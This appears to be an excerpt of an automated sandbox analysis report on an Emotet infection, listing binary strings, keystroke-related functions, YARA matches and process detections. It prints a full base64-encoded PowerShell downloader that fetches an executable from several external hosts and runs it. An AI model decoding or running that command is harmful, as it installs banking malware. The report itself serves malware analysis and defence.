            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://store.office.com/addinstemplate
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://tasks.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: X5cqpizh.exe, 00000003.00000002.1297775729.00000000006EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exeCode function: 3_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_00418A7C
            Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exeCode function: 3_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_00416DBB
            Source: C:\Windows\SysWOW64\wlidres\rtm.exeCode function: 4_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_00418A7C
            Source: C:\Windows\SysWOW64\wlidres\rtm.exeCode function: 4_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00416DBB

            E-Banking Fraud:

            barindex
            Malicious encrypted Powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFIAbAB0ADkAawBxAHcAIAA9ACAAJwBYADUAYwBxAHAAaQB6AGgAJwA7ACQASAB4ADYAMwBzAGgANAA9ACcARgA3ADgANAA2AG8AcgAnADsAJABaAGkAcQBxAHAAZgA4AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQAUgBsAHQAOQBrAHEAdwArACcALgBlAHgAZQAnADsAJABOAHUAcQBzADIAZQA4AD0AJwBYAGIAcQBuAGYAMABtACcAOwAkAFcAaQBqAGIAegA2AHkAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAQwBMAEkAZQBOAHQAOwAkAEkAMgBfAGwAZgBsAHEAPQAnAGgAdAB0AHAAOgAvAC8AZQBlAHAAdgBuAC4AYwBvAG0ALwBjAG8AbgA3AGUAeAB0AF8AcwB5AG0ANAAwADQALwBhAGcAYgB4AF8AYQAyAG4ANwBfAHAAbQBpAGUAOQB1AGYALwAqAGgAdAB0AHAAOgAvAC8AZQBsAG0AcABhAGoAbwBoAGEAbgAuAGkAcgAvAGMAZwBpAC0AYgBpAG4ALwA5AHoAbABfAGoAaQA4AGIAdwBfAHoAZABoAGEAZAAxAGoANQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AaABhAHYAYQBuAG0AbwBiAGkAbABlAC4AdgBuAC8AdwBwAC0AYQBkAG0AaQBuAC8AZAA1AHgAXwB5AF8ANAB1AG8AdwBlAG8AaQBuAGIALwAqAGgAdAB0AHAAOgAvAC8AYwByAGkAYwBmAGMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGcAbQBkAG0AcQBfADkAdwA4AGwAXwBlAGsALwAqAGgAdAB0AHAAOgAvAC8AbQBqAGsALQBzAC4AYwBvAG0ALgB1AGEALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwByAF8AcABnAHUAXwBrAHEAZQBnAG8AcgA2AGYALwAnAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAeAAyADYAcQBmAG8APQAnAFYAawBtADgAbgA1AGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAcwB3AHAANQBpAG0AIABpAG4AIAAkAEkAMgBfAGwAZgBsAHEAKQB7AHQAcgB5AHsAJABXAGkAagBiAHoANgB5AC4AIgBEAGAATwB3AE4ATABgAG8AYABBAEQARgBpAGwAZQAiACgAJABHAHMAdwBwADUAaQBtACwAIAAkAFoAaQBxAHEAcABmADgAKQA7ACQAUABzADcAeQBpAHoAZAA9ACcAVAA0ADYAcgAzAHAAMQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFoAaQBxAHEAcABmADgAKQAuACIATABlAE4AYABnAFQASAAiACAALQBnAGUAIAAyADUAMgAwADIAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwAnACsAJwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQAWgBpAHEAcQBwAGYAOAApADsAJABRAHUAaAB4AHgAdABvAD0AJwBSAHkAcgA0AGEAeQBkACcAOwBiAHIAZQBhAGsAOwAkAEEAMwB5AGQAeQBhAHUAPQAnAFAAZQB4AGwAOQBhAHAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBtADEAagA2ADQAMAA9ACcATQB0AHYAYgB4AG4AMgAnAA==
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 00000003.00000002.1297978189.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545894816.0000000000610000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1298004241.00000000021C1000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545921940.0000000000631000.00000020.00000001.sdmp, type: MEMORY
            Yara detected Emotet DownloaderShow sources
            Source: Yara matchFile source: C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt, type: DROPPED

            System Summary:

            barindex
            Powershell drops PE fileShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\X5cqpizh.exeJump to dropped file
            Very long command line foundShow sources
            Source: unknownProcess created: Commandline size = 2118